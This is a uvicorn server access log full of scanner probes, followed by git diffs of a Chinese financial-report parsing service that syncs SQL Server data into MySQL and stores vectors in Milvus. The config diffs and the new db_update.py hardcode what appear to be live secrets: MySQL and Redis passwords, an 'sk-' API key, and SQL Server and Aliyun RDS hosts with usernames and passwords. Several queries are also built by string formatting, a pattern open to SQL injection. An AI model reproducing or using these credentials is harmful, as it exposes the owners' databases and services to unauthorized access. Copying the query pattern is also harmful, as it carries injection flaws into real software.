INFO: 64.62.156.113:56373 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 123.160.223.74:33085 - "GET / HTTP/1.1" 404 Not Found
INFO: 167.71.11.105:49012 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:36288 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 167.94.138.163:46744 - "GET / HTTP/1.1" 404 Not Found
INFO: 167.94.138.163:46748 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 18.199.93.83:51354 - "GET /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 172.169.6.55:42302 - "GET / HTTP/1.1" 404 Not Found
INFO: 184.105.139.69:28842 - "GET / HTTP/1.1" 404 Not Found
INFO: 184.105.139.69:37052 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 184.105.139.69:37082 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 184.105.139.69:9770 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 208.87.243.131:57870 - "GET http%3A//azenv.net/ HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 124.70.63.89:62210 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 124.70.63.89:13433 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 87.236.176.32:54413 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 64.62.197.172:16101 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.197.176:47069 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.197.170:61969 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.197.167:61305 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 170.64.134.89:39188 - "GET /aaa9 HTTP/1.1" 404 Not Found
INFO: 170.64.134.89:39204 - "GET /aab8 HTTP/1.1" 404 Not Found
INFO: 170.64.134.89:39206 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 154.212.141.171:53736 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 118.26.39.17:57178 - "GET / HTTP/1.1" 404 Not Found
INFO: 118.26.39.17:57214 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 167.94.138.175:45612 - "GET / HTTP/1.1" 404 Not Found
INFO: 167.94.138.175:45628 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 178.32.170.30:38143 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 45.83.65.202:56736 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.83.66.235:14182 - "GET /favicon.ico HTTP/1.1" 404 Not Found

View File

@ -3,7 +3,6 @@ from pydantic import BaseModel
import os import os
import utils import utils
import queue import queue
import multiprocessing
from multiprocessing import Process from multiprocessing import Process
import word_title import word_title
import time import time
@ -85,7 +84,7 @@ def run_job():
p = Process(target=main_word.process_table, args=(file_id, job_info,)) p = Process(target=main_word.process_table, args=(file_id, job_info,))
processes.append(p) processes.append(p)
p.start() p.start()
applog.info(f'等待所有子任务完成任务ID:{file_id}') applog.info(f'等待所有子任务完成任务ID:{file_id}' )
for p in processes: for p in processes:
p.join() p.join()
@ -213,14 +212,14 @@ app.post("/parser/start",
# 运行 FastAPI 应用 # 运行 FastAPI 应用
if __name__ == "__main__": if __name__ == "__main__":
# 服务器启动服务 # 服务器启动服务
# import uvicorn import uvicorn
#
# uvicorn.run(app, host="0.0.0.0", port=config.PORT) uvicorn.run(app, host="0.0.0.0", port=config.PORT)
# 本地调试任务 # 本地调试任务
file_id = "201917" # file_id = "201837"
job_queue.put({ # job_queue.put({
'file_path': '1.docx', # 'file_path': '西部建设.docx',
'file_id': file_id, # 'file_id': file_id,
}) # })
db_service_word.delete_database(file_id) # db_service_word.delete_database(file_id)
run_job() # run_job()

View File

@ -1,33 +1,23 @@
MILVUS_CLIENT='http://124.70.129.232:19530' MILVUS_CLIENT='http://127.0.0.1:19530'
#MILVUS_CLIENT='http://60.204.228.154:19530' MILVUS_HOST = '127.0.0.1'
MYSQL_HOST = '121.37.185.246' MILVUS_PORT = 19530
MYSQL_HOST = '10.127.2.207'
MYSQL_PORT = 3306 MYSQL_PORT = 3306
MYSQL_USER = 'financial' MYSQL_USER = 'financial_prod'
MYSQL_PASSWORD = 'financial_8000' MYSQL_PASSWORD = 'mmTFncqmDal5HLRGY0BV'
MYSQL_DB = 'financial_report' MYSQL_DB = 'financial_report_prod'
NOTIFY_ADDR = 'http://10.127.2.202:8100/api/tenant/report/notify'
# NOTIFY_ADDR = 'http://192.168.0.175:8100/api/tenant/report/notify' FILE_PATH = '/root/pdf_parser/word/'
REDIS_HOST = '10.127.2.209'
NOTIFY_ADDR = 'http://127.0.0.1:8100/api/tenant/report/notify'
# REDIS_HOST = '127.0.0.1'
REDIS_HOST = '123.60.153.169'
REDIS_PORT = 6379 REDIS_PORT = 6379
REDIS_PASSWORD = 'Xgf_redis' REDIS_PASSWORD = 'dMrt4kmwiW6LDJXy'
FILE_PATH = '/root/word_parser/word/'
PORT = 8001 PORT = 8001
MEASURE_COUNT = 8 MEASURE_COUNT = 8
# MYSQL_HOST_APP = '192.168.0.201'#192.168.0.201
# MYSQL_PORT_APP = 3306
# MYSQL_USER_APP = 'root'
# MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
# MYSQL_DB_APP = 'financial_report_prod'
MYSQL_HOST_APP = '10.127.2.207'
MYSQL_HOST_APP = '121.37.185.246'#192.168.0.201
MYSQL_PORT_APP = 3306 MYSQL_PORT_APP = 3306
MYSQL_USER_APP = 'financial' MYSQL_USER_APP = 'financial_prod'
MYSQL_PASSWORD_APP = 'financial_8000' MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
MYSQL_DB_APP = 'financial_report' MYSQL_DB_APP = 'financial_report_prod'
api_key = 'sk-f8413fcfa63a40e49dbb8ac1d0239f6d'

View File

@ -154,9 +154,9 @@ if __name__ == "__main__":
) )
cursor = conn.cursor() cursor = conn.cursor()
# measure_config_to_db(conn,cursor) measure_config_to_db(conn,cursor)
insert_measure_vector(conn,cursor) # insert_measure_vector(conn,cursor)
# cursor.close() # cursor.close()
# conn.close() # conn.close()

View File

@ -209,6 +209,17 @@ def update_ori_measure(conn,cursor,file_id):
and t2.year = '{year}' and t2.year = '{year}'
'''.format(file_id=file_id, year=report_year) '''.format(file_id=file_id, year=report_year)
select_query_first_quarter = '''
SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id
FROM ori_measure_list t1
left join
measure_config_first_quarter t2
on t1.ori_measure_id = t2.ori_measure_id
where t2.measure_id is not null and (t1.measure_id is null or t1.measure_id ='')
and t1.file_id = '{file_id}'
and t2.year = '{year}'
'''.format(file_id=file_id, year=report_year)
if report_type == 1: if report_type == 1:
start_time = time.time() start_time = time.time()
cursor.execute(select_query_half_year) cursor.execute(select_query_half_year)
@ -216,6 +227,13 @@ def update_ori_measure(conn,cursor,file_id):
end_time = time.time() end_time = time.time()
applog.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。") applog.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
applog.info(f'update_ori_measure方法走的是半年报') applog.info(f'update_ori_measure方法走的是半年报')
elif report_type == 2:
start_time = time.time()
cursor.execute(select_query_first_quarter)
records = cursor.fetchall()
end_time = time.time()
applog.info(f"更新数据查询 {(end_time - start_time):.2f} 秒。")
applog.info(f'update_ori_measure方法走的是一季报')
elif report_type == 3: elif report_type == 3:
start_time = time.time() start_time = time.time()
cursor.execute(select_query_thrid) cursor.execute(select_query_thrid)
@ -243,6 +261,9 @@ def update_ori_measure(conn,cursor,file_id):
if report_type == 0: if report_type == 0:
table_name = "measure_config" table_name = "measure_config"
elif report_type == 2:
table_name = "measure_config_first_quarter"
elif report_type == 3: elif report_type == 3:
table_name = "measure_config_third_quarter" table_name = "measure_config_third_quarter"
else: else:
@ -342,7 +363,14 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
measure_index_records = cursor_app.fetchall() measure_index_records = cursor_app.fetchall()
for measure_index_record in measure_index_records: for measure_index_record in measure_index_records:
measure_index_array.append(measure_index_record[0]) measure_index_array.append(measure_index_record[0])
if str(report_type) == "2":
table_index_array = []
measure_index_array = []
applog.info(f'黑名单的值是{parent_table_pages}{table_index_array}以及新增的{measure_index_array}') applog.info(f'黑名单的值是{parent_table_pages}{table_index_array}以及新增的{measure_index_array}')
applog.info(f"black_array:{black_array}")
record_start = record_range.split('-')[0] record_start = record_range.split('-')[0]
record_end = record_range.split('-')[1] record_end = record_range.split('-')[1]
@ -369,6 +397,8 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
filter=filter_str filter=filter_str
) )
# Convert the output to a formatted JSON string # Convert the output to a formatted JSON string
# for i in range(len(res[0])): # for i in range(len(res[0])):
for i in range(len(res[0])): for i in range(len(res[0])):
@ -392,11 +422,13 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
#过滤指标中包含黑名单关键词 #过滤指标中包含黑名单关键词
if utils.check_pdf_measure_black_list(pdf_measure): if utils.check_pdf_measure_black_list(pdf_measure):
continue continue
if f"{table_num}" in measure_index_array and utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app): if f"{table_num}" in measure_index_array and utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
#if utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app): #if utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
applog.info(f'经过第三层规则去除了{table_num}页的{pdf_measure}指标') applog.info(f'经过第三层规则去除了{table_num}页的{pdf_measure}指标')
continue continue
if vector_distance > distance and table_num not in parent_table_pages: if vector_distance > distance and table_num not in parent_table_pages:
#检测规则开始 #检测规则开始
#判断抽取指标和财报指标周期是否相同 #判断抽取指标和财报指标周期是否相同
@ -407,6 +439,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
if(ori_period != pdf_period): if(ori_period != pdf_period):
continue continue
#判断抽取指标和财报指标是否期初指标 #判断抽取指标和财报指标是否期初指标
start_ori_period = utils.get_start_period_type(ori_measure_name) start_ori_period = utils.get_start_period_type(ori_measure_name)
start_pdf_period = utils.get_start_period_type(pdf_measure) start_pdf_period = utils.get_start_period_type(pdf_measure)
@ -423,12 +456,14 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
if(ori_season_type != pdf_season_type): if(ori_season_type != pdf_season_type):
continue continue
#判断是否都是扣非指标 #判断是否都是扣非指标
ori_kf_type = utils.get_kf_flag(ori_measure_name) ori_kf_type = utils.get_kf_flag(ori_measure_name)
pdf_kf_type = utils.get_kf_flag(pdf_measure) pdf_kf_type = utils.get_kf_flag(pdf_measure)
if pdf_measure == '2023年6月30日货币资金合计': if pdf_measure == '2023年6月30日货币资金合计':
applog.info(f'第4处{ori_kf_type}{pdf_kf_type}') applog.info(f'第4处{ori_kf_type}{pdf_kf_type}')
if(ori_kf_type != pdf_kf_type): if(ori_kf_type != pdf_kf_type):
applog.info(f'扣非指标{table_num}页的{pdf_measure}指标')
continue continue
#判断抽取指标和财报指标类型是否相同,是否都是百分比 #判断抽取指标和财报指标类型是否相同,是否都是百分比
@ -465,6 +500,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
continue continue
if(utils.check_white_list(measure_name,pdf_measure)): if(utils.check_white_list(measure_name,pdf_measure)):
applog.info(f"measure_name{measure_name},pdf_measure{pdf_measure}")
continue continue
#判断抽取指标和财报指标类型是否都是增长类,比如同比变动为增长类 #判断抽取指标和财报指标类型是否都是增长类,比如同比变动为增长类
@ -508,6 +544,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
conn.close() conn.close()
client.close() client.close()
#
def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_name): def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,file_id,file_name):
select_year_select = f"""select report_type,year from report_check where id = {file_id}""" select_year_select = f"""select report_type,year from report_check where id = {file_id}"""
cursor.execute(select_year_select) cursor.execute(select_year_select)
@ -527,10 +564,16 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_third_quarter SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_third_quarter
where year = '{year}' where year = '{year}'
'''.format(year=report_year) '''.format(year=report_year)
select_query_first_quarter = '''
SELECT ori_measure_name,measure_name,distance,ori_measure_id,measure_id FROM measure_config_first_quarter
where year = '{year}'
'''.format(year=report_year)
# select_black_array_query = 'SELECT measure_name, keywords FROM measure_black_list where isdel = 0' # select_black_array_query = 'SELECT measure_name, keywords FROM measure_black_list where isdel = 0'
select_black_array_query = ''' select_black_array_query = '''
SELECT measure_name, keywords FROM measure_black_list where isdel = 0 and find_in_set('{year}',year) and find_in_set('{flag}',flag) SELECT measure_name, keywords FROM measure_black_list where isdel = 0 and find_in_set('{year}',year) and find_in_set('{flag}',flag)
'''.format(year=report_year, flag=report_type) '''.format(year=report_year, flag=report_type)
black_array = [] black_array = []
cursor.execute(select_black_array_query) cursor.execute(select_black_array_query)
results = cursor.fetchall() results = cursor.fetchall()
@ -553,6 +596,20 @@ def insert_table_measure_from_vector_async_process(cursor,parent_table_pages,fil
p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,)) p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,))
processes.append(p) processes.append(p)
p.start() p.start()
elif report_type == 2:
start_time = time.time()
cursor.execute(select_query_first_quarter)
records = cursor.fetchall()
end_time = time.time()
applog.info(f"向量配置数据查询 {(end_time - start_time):.2f} 秒。")
applog.info('insert_table_measure_from_vector_async_process方法走的一季报')
start_time = time.time()
records_range_parts = utils.get_range(len(records),MEASURE_COUNT)
processes = []
for record_range in records_range_parts:
p = Process(target=insert_table_from_vector_mul_process, args=(parent_table_pages,file_id,file_name,records,record_range,black_array,))
processes.append(p)
p.start()
elif report_type == 3: elif report_type == 3:
start_time = time.time() start_time = time.time()
cursor.execute(select_query_thrid) cursor.execute(select_query_thrid)
@ -698,11 +755,15 @@ def insert_measure_data_to_milvus(client,table_info,cursor,conn):
measure_list = table['measure_list'] measure_list = table['measure_list']
for measure in measure_list: for measure in measure_list:
measure_name = measure['measure_name'] measure_name = measure['measure_name']
# 需要跳过的一些指标
black_list = ["营业总成本"]
if any(black in measure_name for black in black_list):
continue
measure_value = measure['measure_value'].replace("(", "").replace(")", "") measure_value = measure['measure_value'].replace("(", "").replace(")", "")
measure_name = utils.get_clean_text(measure_name) measure_name = utils.get_clean_text(measure_name)
measure_name = measure_name.replace('2024','2024年').replace('2023','2023年').replace('2022','2022年').replace('','').replace('','')#这个真绝了,怎么都删不掉 measure_name = measure_name.replace('2023','2023年').replace('2022','2022年').replace('','').replace('','')#这个真绝了,怎么都删不掉
#measure_name_1 = measure_name.replace('调整后','') #measure_name_1 = measure_name.replace('调整后','')
quarters = ['第一季度', '第二季度', '第三季度', '第四季度','增减','2024年','2023年','2022年','2021年',''] quarters = ['第一季度', '第二季度', '第三季度', '第四季度','增减','2023年','2022年','2021年','']
for quarter in quarters: for quarter in quarters:
measure_name = measure_name.replace(quarter * 2, quarter) measure_name = measure_name.replace(quarter * 2, quarter)
pattern_dup = re.compile(r'(\w{3,})\1+')#去掉任意超过两个字且重复的字符 pattern_dup = re.compile(r'(\w{3,})\1+')#去掉任意超过两个字且重复的字符
@ -712,7 +773,6 @@ def insert_measure_data_to_milvus(client,table_info,cursor,conn):
measure_name = pattern_dup.sub(r'\1', measure_name) measure_name = pattern_dup.sub(r'\1', measure_name)
measure_name_1 = measure_name.replace('调整后','').replace('上年期末数','上年期末').replace('上年期末','上年年末') measure_name_1 = measure_name.replace('调整后','').replace('上年期末数','上年期末').replace('上年期末','上年年末')
measure_unit = measure['measure_unit'] measure_unit = measure['measure_unit']
if re.match(r'^[+-]?(\d+(\.\d*)?|\.\d+)(%?)$', measure_value) and any(key_word in measure_name for key_word in measure_name_keywords): if re.match(r'^[+-]?(\d+(\.\d*)?|\.\d+)(%?)$', measure_value) and any(key_word in measure_name for key_word in measure_name_keywords):
vector_obj = utils.embed_with_str(measure_name_1) vector_obj = utils.embed_with_str(measure_name_1)
vector = vector_obj.output["embeddings"][0]["embedding"] vector = vector_obj.output["embeddings"][0]["embedding"]
@ -822,7 +882,6 @@ def delete_database(file_id):
"delete from measure_list where file_id = %s;", "delete from measure_list where file_id = %s;",
"delete from word_parse_process where file_id = %s;", "delete from word_parse_process where file_id = %s;",
"delete from table_unit_info where file_id = %s;", "delete from table_unit_info where file_id = %s;",
"delete from word_measure_parse_process where file_id = %s;",
# "delete from a where file_id = %s;", # "delete from a where file_id = %s;",
# "delete from b where file_id = %s;", # "delete from b where file_id = %s;",
] ]

201
zzb_data_word/db_update.py Normal file
View File

@ -0,0 +1,201 @@
import pymssql
import mysql.connector
import logging
# 配置日志
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# SQL Server配置
sql_server_config = {
"server": "203.192.15.17",
"port": 28063,
"user": "zncbuser",
"password": "ZZB-Cbindex-data",
"database": "jydb",
}
# MySQL配置
mysql_config = {
"host": "rm-bp1f85h3xs6mvnf5e3o.mysql.rds.aliyuncs.com",
"user": "zzb_jydb",
"password": "Ysdbsdjs89Yrqwp",
"database": "zzb_jydb",
}
def sync_table(table_name):
try:
# 连接到SQL Server
sql_server_conn = pymssql.connect(**sql_server_config)
sql_server_cursor = sql_server_conn.cursor()
# 连接到MySQL
mysql_conn = mysql.connector.connect(**mysql_config)
mysql_cursor = mysql_conn.cursor()
logging.info(f"Processing table: {table_name}")
# 检查MySQL中是否已存在该表
mysql_cursor.execute(f"SHOW TABLES LIKE '{table_name}'")
table_exists = mysql_cursor.fetchone()
# 获取表的列信息
sql_server_cursor.execute(f"""
SELECT
COLUMN_NAME,
DATA_TYPE,
CHARACTER_MAXIMUM_LENGTH,
NUMERIC_PRECISION,
NUMERIC_SCALE
FROM INFORMATION_SCHEMA.COLUMNS
WHERE TABLE_NAME = '{table_name}'
""")
columns = sql_server_cursor.fetchall()
# 检查是否存在 XGRQ 或 UpdateTime 字段
update_time_fields = ['xgrq', 'updatetime'] # 可能的字段名
update_time_field = None
for col in columns:
if col[0].lower() in update_time_fields:
update_time_field = col[0] # 找到第一个匹配的字段
break
logging.info(f"Table {table_name} has update time field: {update_time_field}")
if not table_exists:
# 如果表不存在,创建表
create_table_sql = f"CREATE TABLE {table_name} ("
for col in columns:
col_name = col[0]
col_type = col[1]
# 类型映射逻辑(略)
create_table_sql += f"`{col_name}` {col_type}, "
create_table_sql = create_table_sql.rstrip(", ") + ")"
logging.info(f"Create table SQL: {create_table_sql}")
# 在MySQL中创建表
mysql_cursor.execute(create_table_sql)
logging.info(f"Table {table_name} created in MySQL.")
else:
logging.info(f"Table {table_name} already exists in MySQL. Updating data...")
# 获取SQL Server中的所有id
sql_server_cursor.execute(f"SELECT {columns[0][0]} FROM {table_name}")
sql_server_ids = {row[0] for row in sql_server_cursor.fetchall()}
# 获取MySQL中的所有id
mysql_cursor.execute(f"SELECT {columns[0][0]} FROM {table_name}")
mysql_ids = {row[0] for row in mysql_cursor.fetchall()}
# 找出需要插入的id
ids_to_insert = sql_server_ids - mysql_ids
logging.info(f"Found {len(ids_to_insert)} new rows to insert.")
# 分批插入数据
batch_size = 10000 # 每批次处理的行数
id_list = list(ids_to_insert)
for i in range(0, len(id_list), batch_size):
batch_ids = id_list[i:i + batch_size]
# 从SQL Server中查询需要插入的数据
sql_server_cursor.execute(f"""
SELECT * FROM {table_name}
WHERE {columns[0][0]} IN ({', '.join(map(str, batch_ids))})
""")
rows_to_insert = sql_server_cursor.fetchall()
# 插入数据到MySQL
if rows_to_insert:
insert_sql = f"INSERT INTO {table_name} ({', '.join([f'`{col[0]}`' for col in columns])}) VALUES ({', '.join(['%s'] * len(columns))})"
mysql_cursor.executemany(insert_sql, rows_to_insert)
mysql_conn.commit()
logging.info(f"Inserted {len(rows_to_insert)} rows into {table_name}.")
# 如果存在更新字段XGRQ 或 UpdateTime检查是否需要更新
if update_time_field:
logging.info(f"Checking for updates based on {update_time_field} field in table: {table_name}")
# 获取SQL Server中的id和更新字段的值且更新字段大于2023年
sql_server_cursor.execute(f"""
SELECT {columns[0][0]}, {update_time_field} FROM {table_name}
WHERE {update_time_field} > '2023-11-12 20:23:23'
""")
sql_server_update_data = {row[0]: row[1] for row in sql_server_cursor.fetchall()}
# 获取MySQL中的id和更新字段的值
mysql_cursor.execute(f"""
SELECT {columns[0][0]}, {update_time_field} FROM {table_name}
""")
mysql_update_data = {row[0]: row[1] for row in mysql_cursor.fetchall()}
# 找出需要更新的id
ids_to_update = []
for id, sql_server_update_time in sql_server_update_data.items():
if id in mysql_update_data and sql_server_update_time != mysql_update_data[id]:
ids_to_update.append(id)
logging.info(f"Found {len(ids_to_update)} rows to update.")
# 分批更新数据
for i in range(0, len(ids_to_update), batch_size):
batch_ids = ids_to_update[i:i + batch_size]
# 从SQL Server中查询需要更新的数据且更新字段大于2023年
sql_server_cursor.execute(f"""
SELECT * FROM {table_name}
WHERE {columns[0][0]} IN ({', '.join(map(str, batch_ids))})
AND {update_time_field} > '2023-11-12 20:23:23'
""")
rows_to_update = sql_server_cursor.fetchall()
# 更新数据到MySQL
if rows_to_update:
update_sql = f"UPDATE {table_name} SET "
update_sql += ", ".join([f"`{col[0]}` = %s" for col in columns[1:]]) # 跳过id列
update_sql += f" WHERE `{columns[0][0]}` = %s"
update_values = [list(row[1:]) + [row[0]] for row in rows_to_update] # 跳过id列
mysql_cursor.executemany(update_sql, update_values)
mysql_conn.commit()
logging.info(f"Updated {len(rows_to_update)} rows in table {table_name}.")
logging.info(f"Sync completed for table: {table_name}")
except Exception as e:
logging.error(f"Failed to sync table {table_name}. Error: {e}")
finally:
# 关闭连接
if 'sql_server_cursor' in locals():
sql_server_cursor.close()
if 'sql_server_conn' in locals():
sql_server_conn.close()
if 'mysql_cursor' in locals():
mysql_cursor.close()
if 'mysql_conn' in locals():
mysql_conn.close()
def main():
try:
# 连接到SQL Server
sql_server_conn = pymssql.connect(**sql_server_config)
sql_server_cursor = sql_server_conn.cursor()
# 获取SQL Server中的所有表
sql_server_cursor.execute("SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE' ORDER BY TABLE_NAME")
tables = sql_server_cursor.fetchall()
# 处理每个表
for table in tables:
if table[0].lower() == "lc_mainshlistnew":
sync_table(table[0])
logging.info("All tables synced successfully!")
except Exception as e:
logging.error(f"Main function failed. Error: {e}")
finally:
# 关闭连接
if 'sql_server_cursor' in locals():
sql_server_cursor.close()
if 'sql_server_conn' in locals():
sql_server_conn.close()
# 启动主函数
if __name__ == "__main__":
main()

File diff suppressed because it is too large Load Diff

View File

@ -0,0 +1,294 @@
import pandas as pd
import mysql.connector
import utils
#from config import MYSQL_HOST, MYSQL_USER, MYSQL_PASSWORD, MYSQL_DB
import re
import redis
def process_excel_and_db(input_excel_path1, input_excel_path2, output_file_path):
# 读取第一个 Excel 文件
df = pd.read_excel(input_excel_path1, sheet_name='Sheet2', header=0)#对应ttt表
# 将 DataFrame 转换为字典列表
data_list = df.to_dict(orient='records')
# 连接到 MySQL 数据库
conn = mysql.connector.connect(
host=MYSQL_HOST,
user=MYSQL_USER,
password=MYSQL_PASSWORD,
database=MYSQL_DB
)
cursor = conn.cursor()
# 插入数据到 measure_create_config 表
insert_query = '''
INSERT INTO measure_create_config
(config_id, meta_measure, same_mean_measure, measure_period, change_type, black_list)
VALUES (%s, %s, %s, %s, %s, %s)
'''
for data in data_list:
show_measure = str(data['指标'])
same_mean_measure = str(data['同义表述'])
period_measure = str(data['周期'])
change_measure = str(data['变动'])
black_list = str(data['黑名单词'])
config_id = utils.get_md5(show_measure)
insert_query_data = (config_id, show_measure, same_mean_measure, period_measure, change_measure, black_list)
cursor.execute(insert_query, insert_query_data)
conn.commit()
# 读取第二个 Excel 文件
df_period = pd.read_excel(input_excel_path2, sheet_name='Sheet2', header=0)#对应周期表
# 将 DataFrame 转换为字典列表
period_list = df_period.to_dict(orient='records')
# 插入数据到 measure_create_period 表
period_insert_query = '''
INSERT INTO measure_create_period
(period_name, same_mean_period)
VALUES (%s, %s)
'''
for data in period_list:
period_name = str(data['标准表述'])
same_mean_period = str(data['同义表述'])
insert_query_data = (period_name, same_mean_period)
cursor.execute(period_insert_query, insert_query_data)
conn.commit()
# 查询数据库
data_query = '''
SELECT * FROM measure_create_config WHERE delete_status = 0
'''
period_query = '''
SELECT * FROM measure_create_period
'''
cursor.execute(data_query)
data_list = cursor.fetchall()
cursor.execute(period_query)
period_list = cursor.fetchall()
# 输出到文件
with open(output_file_path, 'w', encoding='utf-8') as file:
for data in data_list:
config_id = data[0]
show_measure = data[1]
same_mean_measure = data[2]
period_measure = data[3]
change_measure = data[4]
same_mean_measure_arr = []
period_measure_arr = []
change_measure_arr = []
if same_mean_measure != 'nan':
same_mean_measure_arr = same_mean_measure.split(',')
same_mean_measure_arr.append(show_measure)
if period_measure != 'nan':
period_measure_arr = period_measure.split(',')
if change_measure != 'nan':
change_measure_arr = change_measure.split(',')
for c in change_measure_arr:
period_measure_arr.append(c)
for x in period_measure_arr:
if x in change_measure_arr:
show_name = show_measure + x
else:
show_name = x + show_measure
for y in same_mean_measure_arr:
if x in change_measure:
parser_name = y + x
else:
parser_name = x + y
file.write(f'{show_name},{parser_name}\n')
for p in period_list:
period_exra_name = p[0]
period_exra_value = p[1]
if period_exra_name in x:
for v in period_exra_value.split(','):
if x in change_measure:
parser_name = y + x.replace(period_exra_name, v)
else:
parser_name = x.replace(period_exra_name, v) + y
file.write(f'{show_name},{parser_name}\n')
cursor.close()
conn.close()
# 根据老指标配置表生成新指标配置表
def create_new_config(conn, cursor, table_name,old_year,new_year):
select_query = f'''
SELECT measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance,year
FROM {table_name}
WHERE year = '{old_year}'
'''
cursor.execute(select_query)
data_list = cursor.fetchall()
insert_query = f'''
INSERT INTO measure_config
(measure_id, measure_name,ori_measure_id,ori_measure_name,delete_status,measure_vector,distance, year)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s)
'''
for data in data_list:
ori_measure_name = data[3]
if re.match(r'^\d{4}',ori_measure_name):
year = int(re.match(r'^\d{4}',ori_measure_name).group(0))
year += 1
ori_measure_name = str(year) + ori_measure_name[4:]
insert_data = (data[0],data[1],data[2],ori_measure_name,data[4],data[5],data[6],new_year)
cursor.execute(insert_query, insert_data)
conn.commit()
cursor.close()
conn.close()
def measure_config_to_db(conn, cursor, table_name):
year_list = ["2021","2022","2023","2024","2025"]
for year in year_list:
insert_query = f'''
INSERT INTO {table_name}
(measure_id, measure_name, ori_measure_id, ori_measure_name,delete_status,distance,year)
VALUES (%s, %s, %s, %s,%s,%s,%s)
'''
check_query = f'''
SELECT ori_measure_id FROM {table_name}
WHERE year = '{year}'
'''
# 新增指标
lines = [
f"归母净利润同比变动,本报告期比上年同期增减归属于上市公司股东的净利润",
f"扣非净利润同比变动,本报告期比上年同期增减归属于上市公司股东的扣除非经常性损益的净利润",
# f"当期营业成本,本期发生额营业成本",
# f"当期销售费用,本期发生额销售费用",
# f"当期管理费用,本期发生额管理费用",
# f"当期财务费用,本期发生额财务费用",
# f"当期研发费用,本期发生额研发费用",
# f"报告期末应收账款,本期发生额应收账款",
# f"当期营业收入,本期发生额营业收入",
# f"当期营业成本,{year}年第一季度营业成本",
# f"当期销售费用,{year}年第一季度销售费用",
# f"当期管理费用,{year}年第一季度管理费用",
# f"当期财务费用,{year}年第一季度财务费用",
# f"当期研发费用,{year}年第一季度研发费用",
# f"报告期末应收账款,{year}年3月31日应收账款",
# f"当期营业收入,{year}年第一季度营业收入",
# f"报告期末总资产,{year}年3月31日资产",
# f"报告期末总资产,{year}年3月31日资产总计",
# f"报告期末货币资金,{year}年3月31日货币资金",
# f"报告期末货币资金,{year}年3月31日货币资金合计",
# f"报告期末存货,{year}年3月31日存货",
# f"报告期末存货,{year}年3月31日存货合计",
# f"报告期末固定资产,{year}年3月31日固定资产",
# f"报告期末固定资产,{year}年3月31日固定资产合计",
# f"报告期末在建工程,{year}年3月31日在建工程",
# f"报告期末在建工程,{year}年3月31日在建工程合计",
# f"报告期末商誉,{year}年3月31日商誉",
# f"报告期末商誉,{year}年3月31日商誉合计",
# f"报告期末短期借款,{year}年3月31日短期借款",
# f"报告期末短期借款,{year}年3月31日短期借款合计",
# f"报告期末应付账款,{year}年3月31日应付账款",
# f"报告期末应付账款,{year}年3月31日应付账款合计",
# f"报告期末合同负债,{year}年3月31日合同负债",
# f"报告期末合同负债,{year}年3月31日合同负债合计",
# f"报告期末长期借款,{year}年3月31日长期借款",
